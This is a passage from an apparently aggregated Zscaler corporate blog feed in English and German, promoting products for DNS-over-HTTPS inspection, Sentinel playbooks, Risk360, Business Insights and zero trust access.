simplifies the overall security architecture. Streamlined log management: Cloud NSS facilitates the efficient management and scaling of log ingestion. It simplifies the process of collecting and analyzing security logs, making it easier for organizations to manage large volumes of data. Scalability and flexibility: Cloud NSS is inherently scalable, accommodating the growing data and security needs of an organization. This flexibility ensures that as a company grows, its security infrastructure can grow and adapt without major overhauls. Expanded Zscaler Playbooks for Microsoft Sentinel The expanded Zscaler Playbooks for Microsoft Sentinel mark a significant advancement in our joint capability with Microsoft Sentinel. All Zscaler Playbooks leverage OAuth 2.0 for authentication, which result in: Better security: OAuth 2.0 secures your APIs with dynamic credentials, which are time-bound and generated on demand for a client. Limited exposure of credentials: Unlike the authentication model that uses API keys and ZIA admin credentials and may involve user management outside the organization's identity provider, OAuth 2.0 does not require ZIA admin credentials for authentication. Granular access control: The Client Credentials OAuth flow employs API Roles to define permissions required to access specific categories of cloud service API. Fig: OAuth 2.0 Flow Take advantage of the following Zscaler Playbooks to automate your workflows: Zscaler-OAuth2-Authentication: Authenticate using OAuth 2.0 Zscaler-OAuth2-BlacklistURL: Blacklist an IP in the Advanced Threat Protection Module. Zscaler-OAuth2-BlockIP: Block an IP using a URL category blocklist. Zscaler-OAuth2-BlockURL: Block a URL using a URL category blocklist. Zscaler-OAuth2-LookupIP: Lookup the URL category an IP belongs to. Zscaler-OAuth2-LookupSandboxReport: Lookup a Sandbox Report. Zscaler-OAuth2-LookupURL: Lookup the URL category a URL belongs to. Zscaler-OAuth2-UnblacklistURL: Un-blacklist a URL in the Advanced Threat Protection Module. Zscaler-OAuth2-UnblockIP: Remove an IP from a URL category blocklist. Zscaler-OAuth2-UnblockURL: Remove a URL from a URL category blocklist. Zscaler-OAuth2-WhitelistURL: Whitelist a URL in our Advanced Threat Protection Module. Fig: Zscaler-OAuth2.0 LookupURL Playbook The new Zscaler Playbooks for Microsoft Sentinel can be downloaded now from the Zscaler GitHub repository - Wed, 20 Dez 2023 08:00:01 -0800 Paul Lopez Securing DNS over HTTPS (DoH) DNS is often the first step in the cyber kill chain. Snooping on DNS queries yields a treasure trove of information and manipulating DNS resolution is one of the key methods of compromise. While innovations like encrypted DNS over HTTPS (DoH) help conceal queries, they can introduce new challenges for network security admins trying to implement PDNS mandates and inspect DNS traffic for signs of compromise. Fortunately, Zscaler’s DNS security capabilities built into the Zero Trust Exchange can help. DNS is a key vector in the cyber kill chain One of the first steps in any network communication is a DNS query. Given the plaintext nature of these queries, bad actors often conduct reconnaissance on the target infrastructure by snooping on DNS queries. Manipulating DNS can give attackers the ability to conduct man-in-the-middle attacks, compromise endpoints, and steal data. DNS queries are typically connectionless and easier to subvert by modifying or bypassing resolver settings on network devices or endpoints. At the same time, DNS queries can also serve as early warning for threats and one of the best opportunities to neutralize them before any communication is established between the target and the malware site or C2 server. Attackers know this and often take great pains to conceal their DNS activity using obfuscation techniques such as cycling through many domains and subdomains. DNS is also often abused as the protocol for malware command and control, with TXT records being used to send commands and A records used to exfiltrate data. One of the earliest and best opportunities to identify and neutralize threats, while identifying infected hosts and bad actors, is in the initial DNS requests and within the ongoing DNS communications. DNS is used by most legitimate web and non-web applications in at least one stage of any given session. This is often at the very beginning of any session like with normal web requests or SSH sessions but sometimes repeatedly throughout sessions. Bad actors recognize the need for DNS communications and the opportunity to leverage DNS in several stages of any given attack. From simply getting targets to malicious locations, post-infection mid-stage for C2 instruction, to the exfiltration of data at the end stages, DNS is often integral in an attack chain. Attackers take great pains to conceal their attacks’ DNS activity by using a variety of common means to conceal or obfuscate request and response communication, by cycling through many domains or subdomains, by abusing the protocol or using it for malicious purposes, or by poisoning entries and pointing resolutions to attacker-controlled resolvers. Figure 1: DNS Control Breaks the Kill Chain New emphasis on DNS security in an encrypted world One of the biggest changes underway is the push to encrypted DNS. DNS over HTTPS (DoH) started out purely as a privacy tool but is now increasingly recommended by national governments worldwide as a way for industries to maintain security and integrity, in addition to privacy, in what has been up until now one of the last major services to remain widely unencrypted. Many of these same national governments led by the Five Eyes intelligence alliance and their close allies often require their national agencies to use DoH as a key ingredient in their Protective DNS (PDNS) mandates. Figure 2: National governments increasingly recommend–and in some cases, require–a PDNS solution Unfortunately, attackers are also aware of both the trend toward encrypted DNS and the opportunity it presents them – particularly when DoH is often not able to be inspected or only partially inspected. Attackers are also aware that DoH is increasingly enabled by default in most browsers, configurable by users and processes. And since DoH is increasingly recommended as a best practice in the PDNS recommendation and mandate and beyond, it is no longer unusual to have DoH traffic in a corporate network and it is no longer acceptable to be simply blocked when encrypted web (HTTPS generally) is able to be inspected. New challenges for legacy solutions Bad actors understand better than most that legacy-gen firewall and proxy designs – whether now “cloudified” or still trapped in virtual or physical boxes – are inherently limited to simple block/allow policies for encrypted DNS. Crime syndicates further understand that administrators are hesitant to enable TLS decryption since this often results in a noticeable performance degradation on legacy-gen appliance-based firewalls. Inspecting SSL/TLS results in a step function of added hardware spend or complicated user and traffic segmentation or added network administration complexity – usually all three at once. Figure 3: Using only a pure-play DNS resolver service may mean some DNS queries bypass DNS security controls Some of the more advanced legacy vendor solutions extend their general DoH block/allow policies to known resolver services. This means they trust certain third-party DoH resolvers but continue to leave the content of the DNS over HTTPS communication uninspected and policy unenforced. Because of this inspection gap, companies often need to concurrently engage and manage unintegrated third-party DNS service providers and manage policies across multiple platforms. All the while trying to ensure that no attacker malware or insider circumvents this by reaching a new unsanctioned or malicious DoH service provider. Figure 4: Legacy-gen firewall-only and standard proxy solutions have limitations on DNS inspection and may not have or may miss DNS inspections. They also usually require another vendor to deliver a complete DNS solution. Securing DNS with Zscaler using zero trust controls in the cloud Zscaler provides a proxy and security control layer in our Zero Trust Exchange for all traffic including DNS. All DNS over HTTPS and standard DNS traffic is fully inspected regardless of what DNS resolver service is used by the endpoint. Zscaler also secures recursive and iterative requests. Using Zscaler for DNS brings the zero trust approach to all DNS for complete security. This means that all DNS transactions are inspected and secured according to security policy for all users, workloads, and servers, all the time. This not only fulfills the security demands of Protective DNS and other DNS security best practices but extends corporate security to all DNS over HTTPS and to all corners of the customer estate from mobile users to cloud workloads to guest Wi-Fi access points. Figure 5: Complete zero trust DNS security Complete zero trust DNS security steps for every DNS transaction that ensure NIST 800-207 principles including: What is the identity of the user? Endpoint, workload, server? Which DNS protocol is being used (DoH, UDP:53, TCP:53)? What is being communicated, requested? Domain, metadata, tunnel, record type? Where is the DNS transaction trying to go? Where should the DNS transaction go instead? Is the inspected request side transaction allowed considering the above? What is the category of the inspected content? Allow/Block/Log request and action. Does the request need to be translated to another DNS protocol (UDP to DoH, etc)? What is the inspected response back to the matching allowed request? Is this expected and allowed for the user? Domain, content, metadata tunnel, record type, etc.? Allow/Block/Log response and action. If the response is allowed, does it need to be translated back to the original DNS protocol (DoH to UDP, etc)? Complete the allowed DNS transaction. Complete and enrich log data for the transaction. Global scale of the Zscaler Trusted Resolver Another unique capability of the Zscaler service is the optional Zscaler Trusted Resolver (ZTR). The ZTR are clusters of DNS resolvers in almost all of our 150 global data centers that can be used by Zscaler customers for public recursive queries. DNS requests to any provider can be configured to be intercepted as they transit to the Zero Trust Exchange and instead are resolved at the data center instance of ZTR nearest to the requestor. Optionally the ZTR can be addressed explicitly and further remove any need for a public resolver or third-party service. DNS resolution is not currently part of either the SASE or SSE definitions, so most of these vendors do not offer a DNS resolution capability. DNS resolution requires a separate vendor if Zscaler is not used. Zero trust DNS security is provided for all DNS transactions independent of whether the Zscaler Trusted Resolver is used or not. The benefits of ZTR are centered on having a fast, highly available DNS service that is globally distributed and returns geographically localized resolutions. Since ZTR supports DNSSEC, there is the added advantage of high-integrity resolutions in addition to Zero Trust DNS security. Capability Zscaler Other SSE Solutions Legacy-Gen Firewalls DNS Providers Standard DNS content inspection ✅ ✅ ✅ Can be bypassed Basic DoH inspection ✅ If DoH then Block/Allow If DoH then Block/Allow Typically bypassed DoH content inspection ✅ X Limited by TLS decryption capacity Typically bypassed Global DNS resolution service ✅ X X ✅ Complete DNS Control — better security and performance The Zscaler Zero Trust Exchange is the only cloud-native solution that offers complete DNS security along with better DNS performance through our Trusted Resolver. DNS Control is a single, consolidated function embedded within the wider Zscaler service that directly delivers the highest DNS security efficacy with the best possible user experience all while reducing vendor sprawl, complexity, and cost. Organizations needing to improve DNS security and privacy or facing PDNS mandates can ensure that they have protection against emerging DNS-based threats. All customers with ZIA and Cloud Firewall enabled can configure DNS Control rules, including full inspection of DoH traffic. Fri, 15 Dez 2023 08:00:01 -0800 Stefan Sebastian Zscaler Risk360 − Ausblick In den letzten Monaten haben wir mit vielen Organisationen darüber gesprochen, wie sich das Cyber-Risikomanagement verbessern ließe. Dabei haben wir eine enorme Nachfrage nach einer verlässlichen und wiederholbaren Methode zur Steuerung und Minderung von Cyberrisiken erkannt. Dafür gibt es gute Gründe: Da ist zum einen die Notwendigkeit, Cyberrisiken zu beziffern und zu mindern, um die Sicherheitslage allgemein zu verbessern und so die Wahrscheinlichkeit eines Angriffs zu senken. Zum anderen kommen immer neue Berichtspflichten hinzu – sowohl intern gegenüber Vorgesetzten und Vorstand als auch extern wie etwa im Rahmen der neuen SEC-Meldepflichten. Vor diesem Hintergrund setzen Unternehmen gerne auf manuelle Prozesse, bei denen sie Daten aus verschiedenen Programmen zusammenführen, normalisieren und anschließend in Berichtsform präsentieren. Das ist nicht nur zeitaufwendig, sondern bindet auch Mitarbeiter, die sich ansonsten um den aktiven Schutz der Unternehmensressourcen kümmern könnten. Deshalb werden häufig auch Drittanbieterprodukte eingesetzt, deren Anschaffung allerdings hohe Kosten verursacht und die zudem noch recht kompliziert und lückenhaft sind. Um das zu ändern, hat Zscaler diesen Sommer mit Risk360 ein neues Produkt auf den Markt gebracht. Risk360 basiert auf der Zscaler Cloud und wurde zur Lösung der genannten Problemstellungen entwickelt. Bereits jetzt gibt es ein erstes umfangreiches Produktupdate mit zahlreichen Verbesserungen. Der Risk360-Vorteil Zscaler Risk360 ist ein leistungsstarkes Framework zur Bezifferung, Visualisierung und Behebung von Cyberrisiken. Es erfasst Daten aus externen Quellen und der Zscaler-Umgebung des Unternehmens und erstellt auf dieser Grundlage einen detaillierten Überblick über die Risikolage in allen vier potenziellen Angriffsphasen. Dabei kommen über 110 Risikofaktoren aus der gesamten Angriffskette zur Anwendung. Diese decken Risiken, Bedrohungen und potenziell gefährliche Useraktionen ab, die ein Risiko für das Unternehmen bergen. Risk360 errechnet aus diesen Faktoren dann das Cyberrisiko und behält es im Zeitverlauf im Blick. Außerdem werden Empfehlungen zu Risikominderung und entsprechenden Abläufen geliefert. Darüber hinaus beziffert Risk360 das finanzielle Risiko und generiert per Mausklick aktuelle Vorstandsberichte. Zu den besonderen Stärken von Risk360 gehört die Möglichkeit, die Wirksamkeit von Sicherheitskontrollen in den vier Angriffsphasen zu evaluieren: Angriffsfläche, Kompromittierung, Ausbreitung und Datenverlust. Dabei nutzt Risk360 die bewährte Zscaler-Architektur und ist direkt in den Datenverkehr eingebunden. So wird Risk360 mit Daten versorgt und Organisationen können die Cyberrisiken bequem mit ihrer aktuellen Zscaler-Bereitstellung managen, ohne zusätzliche Kosten auf sich zu nehmen. Neuerungen Zscaler hat Risk360 erst vor wenigen Monaten veröffentlicht. Doch schon jetzt kommt das erste große Produktupdate. Das sind die Neuerungen: Neue CrowdStrike-Einbindung: Risk360 lässt sich nun auch in CrowdStrike einbinden, damit Risikosignale von der dortigen Threat-Intelligence-Plattform abgerufen werden können. So kann Risk360 potenzielle Risiken noch besser identifizieren. Erkennung von UEBA-Risiken: Das Verhalten von IT-Nutzern und IT-Entitäten zu analysieren (User and Entity Behavior Analytics, UEBA), ist ein wichtiger Bestandteil der Cybersicherheit. So können Organisationen potenzielle Bedrohungen durch Insider und kompromittierte Userkonten erkennen und abwehren. Risk360 kann UEBA-Risiken nun anhand zusätzlicher Faktoren gezielt hervorheben, das Userverhalten analysieren und ungewöhnliche Aktivitäten erkennen.  KI-gestützte Sicherheitsprüfungen: Die generative Zscaler-KI enthält eigens entwickelte große Sprachmodelle (LLM) und kann völlig neue Bewertungen erstellen. Diese können kostspielige externe Berater ersetzen und ein genaueres Bild davon vermitteln, wie es um die Zero-Trust-Sicherheit des Unternehmens bestellt ist. Erweiterte Finanzmodelle: Risk360 wurde um weitere Modellierungsfunktionen mit Monte-Carlo-Simulationen ergänzt. So können verschiedene Szenarien unter Berücksichtigung von Finanz- und Restrisiken, inhärenten Risiken und Risikotoleranz erstellt werden. Die genauere Schätzung des potenziellen Finanzrisikos unterstützt dabei die Schadensbegrenzung aus finanzieller Sicht. Umsetzung von Risiko-Frameworks: Zur Umsetzung gängiger Branchenstandards wurde Risk360 um Frameworks wie MITRE ATT&CK und NIST CSF ergänzt. Diese werden somit automatisch angewendet, was Organisationen in den Bereichen Risikominderung und Compliance entlastet. SEC-Konformität: Risk360 wurde um weitere Berichtsfunktionen ergänzt, die u. a. die Einhaltung der SEC-Vorschrift SK 106 (b) zur Beschreibung von Cybersicherheitsprozessen gewährleisten. Mit den Neuerungen eröffnet Risk360 Unternehmen auch weiterhin ein umfassendes, datengestütztes Cyber-Risikomanagement. Um mehr zu erfahren, können Sie sich zu unserem Webinar anmelden. Darin geht es um Zscaler Risk360 und das neue Zscaler Business Insights. Sie können aber auch gerne eine Demo bei uns anfordern Tue, 12 Dez 2023 04:00:01 -0800 Raj Krishna Zscaler Business Insights: Optimierte Büroauslastung und niedrigere SaaS-Kosten Die Arbeitswelt entwickelt sich ständig weiter. So sind die Belegschaften in den letzten Jahren immer dezentraler geworden. Um diesem Umstand Rechnung zu tragen, nutzen Unternehmen für Zusammenarbeit und Produktivität inzwischen gerne SaaS-Anwendungen. Der aktuelle Wandel betrifft vor allem das Aufkommen hybrider Arbeitsmodelle, bei denen die Mitarbeiter abwechselnd im Homeoffice und im Büro arbeiten. Dabei geht es vor allem darum, die gemeinsame Arbeit im Büro mit der Flexibilität der Telearbeit in Einklang zu bringen. Selbstverständlich sind die zuständigen Führungskräfte bestrebt, die SaaS-Aufwendungen und Immobilienkosten möglichst gering zu halten. Doch dazu brauchen Sie Transparenz mit Blick auf Kostenfaktoren wie Büroflächen und SaaS-Anwendungen. Das ist mit den bisherigen Mitteln allerdings kaum möglich. Denn allzu oft bleibt es bei unzuverlässigen manuellen Prozessen und Schätzungen, die dann in Kalkulationstabellen übertragen werden. Viele Immobilien- und Facility-Abteilungen werten auf diese Weise auch Ausweislesegeräte zur Arbeitszeiterfassung aus, um das Mitarbeiterverhalten besser zu verstehen und die Rückkehr ins Büro zu fördern. Einige Unternehmen setzen beim Monitoring der SaaS-Nutzung ironischerweise sogar teure SaaS-Verwaltungsprogramme ein, die häufig aber gar kein genaues Bild des tatsächlichen SaaS-Aufwands liefern. Um das zu ändern, bringt Zscaler mit Business Insights nun die jüngste Ergänzung seines Business-Analytics-Portfolios auf den Markt. Das leistungsstarke Produkt ermöglicht eine genaue Bemessung der Nutzung und Kosten von SaaS-Anwendungen bei gleichzeitiger Optimierung der Büroauslastung. So können Unternehmen datengestützte Entscheidungen treffen und ihre hybriden Arbeitsweisen deutlich effizienter und kostengünstiger gestalten. Optimierung von SaaS-Nutzung und -Ausgaben Zscaler Business Insights überzeugt vor allem mit den umfassenden Einblicken in SaaS-Nutzung und -Ausgaben. Denn bei vielen Unternehmen verursachen redundante Anwendungen und ungenutzte Lizenzen unnötige Kosten und Betriebsaufwand. Vorteile von Business Insights für IT-Entscheider: • Ein vollständiger Überblick über sämtliche SaaS-Anwendungen • Verlässliche Daten über die SaaS-Nutzung • Rationalisierte Nutzung von SaaS-Anwendungen und Erkennung überflüssiger Apps • Visualisierung von SaaS-Einsparungen durch die Beseitigung ungenutzter Anwendungen und Lizenzen Reibungslose Rückkehr ins Büro Wenn Mitarbeiter ins Büro zurückkehren, sind genaue Zahlen zur Büroauslastung eine entscheidende Voraussetzung für eine optimale Flächennutzung. Hier liefert Business Insights wichtige Daten und hilft Unternehmen so dabei, ihre Büroflächen optimal zu nutzen und Bereiche zu bestimmen, in denen Flächen abgebaut werden können. Vorteile von Business Insights für die IT- und Beschaffungsabteilung sowie Immobilienverwalter: Tägliche Zahlen zu Anwesenheiten und Hybrid- bzw. Remotearbeit Zahlen zu besonders häufig/selten anwesenden Abteilungen Stundenweise Visualisierung der Bürofrequentierung für eine optimale Flächenzuweisung für Besprechungen, Mahlzeiten und andere Angebote Wöchentliche, monatliche und vierteljährliche Trends der Büronutzung Ein durchgängiges Standortmanagement mit genauen Zahlen zur Büroauslastung (demnächst) Zscaler Business Insights ermöglicht die unveränderte Weiternutzung der bestehenden Zscaler-Architektur zur Optimierung von SaaS- und Büronutzung für eine effiziente und kostengünstige Digitalisierung. Hier finden Sie weitere Informationen und können eine Demo anfordern. Tue, 12 Dez 2023 04:00:01 -0800 Aditya Jayan Why Rethinking Legacy Network Architectures Is Key For Enterprises Ransomware attacks increased by 37% in 2023, with the average enterprise paying ransom payments exceeding $100,000. The latest Zscaler ThreatLabz report discusses this in detail. This is just one example of cyberattacks that are plaguing institutions. These attacks happen due to large attack surfaces, compromising systems, moving laterally through the organization, and then exfiltrating the data. Opportunities for Cybercriminals It's not that organizations aren't looking to prevent attacks from happening, it's that organizations need to rethink their network architecture, especially given the refactoring that has happened over the last couple of years. IT teams had to pivot as organizations went 100% remote and then shifted again as many organizations became hybrid, with employees coming into the office a couple of days a week. These changes impact employees and how they work. Now, they expect great experiences from both their home environment and their in-office environment, but often fail to consider the security implications. Protecting the company's assets shouldn’t introduce complexity or impact end users. As organizations have dealt with these changes in strides, they have also continued investments in cloud resources to keep up with business demand. Workloads must also have seamless, secure connectivity across clouds, VPCs, and data centers. Keeping these workloads safe is essential as they are extensions of your data centers and applications. The simple yet complex question is: "does it make sense to continue purchasing VPNs and firewalls, expanding unsecured WAN connectivity, and connecting cloud workloads without rethinking the current network architecture for the future?" When dissecting this question, thinking through all the challenges and potential approaches can be difficult. Here are some sample questions to consider: Are VPNs and firewalls required in all circumstances? Do they open up more of an attack surface, making it easier for threat actors? My WAN infrastructure connects users and devices to all applications, which works fine, but is it secure, and can I reduce costs (MPLS) since many people work from home? How can I ensure that my end users' performance is optimal with the hybrid workforce? Are they being backhauled with a VPN to a data center, and is that the most efficient way? Do we have the necessary monitoring tools to identify last-mile ISP and Wi-Fi issues? We are moving mission-critical workloads to the cloud, but securing them is challenging. The cloud has some security capabilities, but what are the best methods to educate our staff and move away from point solutions? Looking back at the last few years, it's impressive how IT teams have kept the lights running with minimal staff. They've endured a lot, from their expanded roles to ensuring the business thrives. We can't anticipate what the future holds. However, if you architect it in a way that can solve many challenges through simplicity and lower costs, it's worth considering. Take a few moments to download our ebook and dive deeper into future-proofing your network architecture. Tue, 12 Dez 2023 08:58:18 -0800 Rohit Goyal Zscaler Business Analytics für dezentrale Unternehmen Unternehmen sind immer dezentraler aufgestellt – woraus sich zahlreiche neue Herausforderungen ergeben. Denn Arbeiten ist heute praktisch von überall aus möglich: von zu Hause oder unterwegs aus oder auch im Rahmen hybrider Arbeitsmodelle. Die Unternehmen haben natürlich ein Interesse daran, die Produktivität ihrer Mitarbeiter zu wahren. Dazu setzen sie SaaS-Apps ein und wollen IT-Probleme möglichst vermeiden. Doch zugleich vergrößern SaaS-Anwendungen und mobile User ihre Angriffsfläche und ihr Cyberrisiko immer mehr. Kaum aussagekräftige Daten Diese Trends sind eine wesentliche Facette der Digitalisierung und bringen neue Herausforderungen für IT-Entscheider mit sich. Wie lassen sich Kosten und (Cyber- wie auch Produktivitäts-)Risiken eingrenzen, wenn die Arbeit in SaaS-Anwendungen, Homeoffice und Niederlassungen auf der ganzen Welt erfolgt? Die Antwort: mit den richtigen Analysen und Daten. Unsere Kunden berichten immer wieder, dass ihnen aussagekräftige Zahlen zu Cyberrisiken, User Experiences für Remote-Arbeitskräfte und Ausgabeposten wie SaaS oder schlecht ausgelasteten Büroflächen fehlen. Sie kommen mit den bisherigen Lösungen einfach nicht mehr weiter. Deshalb kaufen sie oft kostspielige Programme hinzu oder belasten ihre Mitarbeiter mit aufwendigen Analyse- und Berichtsabläufen. Einzellösungen – etwa für Netzwerkmonitoring, die Verwaltung von SaaS-Anwendungen oder Risikoermittlung – verursachen jedoch immer zusätzlichen Aufwand, liefern aber nur selten ein zuverlässiges und umfassendes Bild, wie es die Unternehmen brauchen. Natürlich ist auch die manuelle Auswertung von Rohdaten und deren Einarbeitung in Kalkulationstabellen ineffektiv und zeitaufwendig. Zscaler Business Analytics: Portfolio Ab sofort können Unternehmen mit Zscaler Business Analytics Kosten und Risiken senken, die sich aus dezentralen Belegschaften ergeben. Denn Zscaler liefert genau die Daten, die für eine sichere und produktive Digitalisierung benötigt werden. Zscaler ist übrigens auch der einzige Anbieter mit einem Komplettangebot im Bereich Business Analytics. Bei Zscaler Business Analytics werden Echtzeitdaten aus dem gesamten Unternehmen in praxisorientierte Empfehlungen umgewandelt – ohne zusätzliche Programme oder Anbieter. Das Angebot setzt sich aus drei Kernprodukten zusammen: Zscaler Digital Experience steigert die Produktivität durch die schnelle Erkennung und Behebung von Anwendungs-, Netzwerk- und Geräteproblemen. Zscaler Risk360 steuert und begrenzt Cyberrisiken in allen vier Angriffsphasen. Zscaler Business Insights optimiert SaaS-Budget und Büroauslastung. Die spezielle Zscaler-Architektur Bevor auf die aktuellen News eingegangen wird, sollen zunächst die Hintergründe des Zscaler-Angebots für Business Analytics beleuchtet werden. Der zentrale Begriff lautet hier: Architektur. Unsere Proxy-Architektur ist direkt in den Datenverkehr eingebunden, sodass dieser komplett über Zscaler läuft. Die Zscaler Zero Trust Exchange wickelt dabei rund 320 Milliarden Transaktionen und 500 Billionen Signale pro Tag ab. Das sind mehr Daten als bei jedem anderen Sicherheitsanbieter. Dazu zählen nicht nur sicherheitsrelevante Signale, sondern auch User- und Geräteaktivitäten, die die Grundlage von Zscaler Business Analytics bilden. Andere Architekturen basieren dagegen auf Firewalls und setzen vor allem auf Abschottung. Da sie nicht in den Datenfluss eingebunden sind, können sie weder Daten noch Analysen für die Digitalisierung oder dezentrale Geschäftsprozesse liefern. Transparente Geschäftsdaten Dürfen wir vorstellen? Business Insights − der neueste Zuwachs von Zscaler Business Analytics. Business Insights liefert genau die Daten, die für die richtige Bemessung der SaaS-Nutzung und die geregelte Rückkehr ins Büro benötigt werden. Damit ermöglicht Business Insights: Bestandsaufnahmen des gesamten SaaS-Portfolios zur Ermittlung von Einsparmöglichkeiten durch ungenutzte Lizenzen. Erkennung von Doppelausgaben und redundanten Anwendungen (wie mehreren ähnlichen UCaaS-Lösungen) durch ein KI-gestütztes Anwendungsverzeichnis. Ermittlung von Kennzahlen zum hybriden Arbeitsmodell de Organisation unter Berücksichtigung der Mitarbeiterpräsenz in einzelnen Regionen und Niederlassungen zur besseren Planung der Rückkehr ins Büro. Optimierte Planung in Bezug auf Mahlzeiten, Platzbedarf und Einrichtungen mittels Anwesenheitsanalysen. Weitere Informationen finden Sie in unserem Blogbeitrag zu Business Insights. Risk360 für eine bessere Steuerung von Cyberrisiken Anfang des Jahres wurde eine weitere zentrale Komponente von Zscaler Business Analytics auf den Markt gebracht. Mit Zscaler Risk360 können Unternehmen Cyberrisiken in der gesamten Angriffskette aktiv beziffern und verringern. Dabei werden mithilfe von Echtzeitdaten aus Ihrer Zscaler-Umgebung intuitive Visualisierungen, Details zum finanziellen Risiko und praktische Empfehlungen erstellt, die die Risikominderung unterstützen. Risk360 hilft auch bei Gesprächen mit Vorständen und Führungskräften und ermöglicht fundierte Entscheidungen zum Schutz wichtiger IT-Ressourcen. Seit der Einführung von Risk360 im Sommer wurden noch einige weitere Sicherheitsfunktionen ergänzt: KI-gestützte Analysen mit den neuesten großen Sprachmodellen zur Erstellung detaillierter Berichte zur Cybersicherheit und zum aktuellen Stand des Unternehmens im Bereich Zero Trust. Neue Risikofaktoren, etwa durch CrowdStrike und User (UEBA).​ Erweiterte Finanzrisikomodelle, jetzt auch mit Monte-Carlo-Szenarien. Berücksichtigung von Risiko-Frameworks wie MITRE ATT&CK und NIST CSF. SEC-Offenlegungsbeispiele für S-K Item 106. Weitere Informationen zu den Verbesserungen an Risk360 finden Sie in unserem Blog. Optimierte User Experience mit ZDX Unternehmen benötigen Unterstützung bei der Geräte-, Netzwerk- und Anwendungsüberwachung. Einzellösungen fehlt der Überblick, den Servicedesk und IT brauchen. Diese stehen unter enormen Druck, überall eine einwandfreie User Experience zu gewährleisten, Probleme schnell zu lösen und für reibungslose Abläufe zu sorgen. Doch Rettung naht! Die neuesten Verbesserungen an der Zscaler Digital Experience (ZDX) liefern KI-gestützte Daten, die das Ticketvolumen reduzieren, die Fehlersuche beschleunigen und die Zusammenarbeit zwischen Servicedesk und IT vereinfachen. Zscaler durchsucht bei der Ursachenanalyse sämtliche Geräte, Netzwerke und Anwendungen, sodass sich Produktivität und Zufriedenheit der User in Sekundenschnelle steigern lassen. Das Zscaler Digital Experience Incident Dashboard Im aktuellen Geschäftsumfeld werden aussagekräftige Daten benötigt, um die Digitalisierung sicher, produktiv und auf solider Grundlage zu meistern. Zscaler Business Analytics enthält vielfältige Lösungen zur Optimierung von SaaS-Nutzung und -Kosten und zur Optimierung von Cyber-Risikomanagement und der User Experience. Mit Business Insights, Risk360 und ZDX können Sie Ihre Effizienz steigern, Kosten senken und eine nahtlose User Experience schaffen. Mit Zscaler an Ihrer Seite erhalten Sie die nötige Orientierung im aktuellen wirtschaftlichen Umfeld. Tue, 12 Dez 2023 04:00:01 -0800 Raj Krishna What Did Plato Have to Say About Zero Trust Security? Plato was a philosopher from the fifth century B.C. whose work guided human thought for centuries. Nearly 2,500 years later, his influence still echoes everywhere. This is true even in cybersecurity when it comes to zero trust. How so? To answer that question, let’s take a look at one of Plato’s famous teachings. Plato’s allegory of the cave This allegory might sound somewhat strange to our modern ears, but let’s dive in. Imagine a deep, dark cave. Within the cave, several individuals have been chained up for the entirety of their lives, and the only thing they have ever been able to see is the cave wall in front of them. Behind them is another group of people. This latter group is using the light from a fire, along with shapes and replicas of things that exist outside the cave, to cast shadows onto the aforementioned cave wall (take a look at the image below if you’d like some help visualizing things). When the prisoners see these shadows, they are left to believe that the shadows themselves are the “real things,” and that the shadows do not correspond to anything else. For example, if they see shadows of bird shapes, they assume that the shadows are what birds truly are; they do not know that what they see are just shadows cast by replicas that are designed to look like real things (real birds) that exist outside the cave. To see the true forms behind the shadows and the imitations casting them, one would need to leave the cave and behold reality in the light of the sun—where things are quite different. (If you would like to read more about this allegory, you can find a highly scholarly source here). What does this have to do with cybersecurity? Now, we can’t be sure that Plato was thinking about cybersecurity when he came up with the above allegory (although he almost certainly was). Either way, the allegory of the cave has clear applicability when it comes to our present topic. For decades, organizations have been shown the shadows of faulty replicas of what cybersecurity actually is. They have been led to believe that what they are seeing is the “true form” of how security is supposed to look. Specifically, they have been presented continually with hub-and-spoke networks guarded by castle-and-moat security models. But this kind of architecture is a poor fit in the modern world with its remote workers, cloud applications, and increasingly sophisticated cyberthreats that know how to take advantage of the security status quo. Today, these perimeter-based architectures have multiple, crucially important challenges: They endlessly extend the network to more and more users, locations, devices, and clouds, meaning that the attack surface is expanded for cybercriminals They enable cyberthreat infections and data loss because the appliances on which they are built lack the scalability necessary to inspect traffic (particularly encrypted traffic at scale) and enforce real-time security policies They permit lateral threat movement by placing users and entities onto the network, where they can move from resource to resource and cause extensive damage They also suffer from a variety of other challenges related to cost, complexity, operational inefficiency, poor user experiences, organizational rigidity, and more Zero trust for true security Zero trust is the security reality that makes the perimeter-based shadows and shapes pale in comparison. In fact, the truth is even harsher: perimeter-based architectures are not even shadows or shapes of zero trust, the true form of security. That’s because zero trust is a fundamentally different architecture that separates security and connectivity from network access, and delivers comprehensive security as a service from the cloud. As a result, it does not suffer from the aforementioned challenges of perimeter-based architectures. With a zero trust architecture powered by the Zscaler Zero Trust Exchange, organizations can: Minimize the attack surface by hiding devices and apps behind the Zero Trust Exchange, eliminating exploitable tools (e.g., firewalls and VPNs), and stopping endless network expansion Stop compromise and data loss through high-performance, cloud-powered inspection of all traffic, including encrypted traffic at scale, to block threats and data loss in real time Prevent lateral threat movement by connecting users, devices, and workloads directly, one to one, instead of connecting them to the network as a whole Solve other critical challenges by decreasing complexity, increasing operational efficiency, enhancing user experiences, and improving organizational agility, all contributing to greater economic value It’s time to cast the shackles aside, depart from Plato’s cave, and behold the true form of security in the light of day. It’s time to embrace zero trust and never look back. Register for our upcoming webinar, “How to Reduce Cyber Risk While Embracing Digital Transformation,” to learn more about zero trust architecture and how it is helping modern organizations solve their networking and security problems. You will also hear firsthand from a Zscaler customer as they discuss their benefits and learnings from embracing the Zero Trust Exchange. Wed, 10 Jan 2024 08:00:02 -0800 Jacob Serpa Secure Private Access – ZPA Private Service Edge on Equinix Network Edge In 2023, there has been a more than 37% increase in ransomware attacks. The average ransom payment for enterprises has surpassed $100,000, with an average demand of $5.3 million1. Even the White House laid down a mandate to curb such attacks, calling for organizations to bolster their security with zero trust. A zero trust architecture establishes a connection to the specified application only and not to the entire corporate network. In the past, enterprises used remote access VPN technologies to connect remote workers to corporate applications. This approach expands the attack surface and results in lateral movement of threats across a company’s internal systems. A zero trust architecture, however, curtails such movements and eliminates the attack surface. Zscaler Private Access (ZPA) is the Zero Trust Network Access (ZTNA) platform that applies the principles of least privilege to give users secure, direct connectivity to private applications running on-prem or in the public cloud while eliminating unauthorized access and lateral movement. As a cloud native service built on a holistic security service edge (SSE) framework, ZPA can be deployed in a matter of hours to replace legacy VPNs and remote access tools. In exploring secure private access, many organizations have adopted ZPA Private Service Edge, in which a localized version of Zscaler Private Access (ZPA) is deployed within the customer’s data center. This has enabled Zscaler customers to access private applications regardless of the location of the user and the app, with reduced latency and secure access. Now, Zscaler and Equinix together bring the ZPA service on Equinix Network Edge. ZPA Private Service Edge on Equinix Network Edge ZPA Private 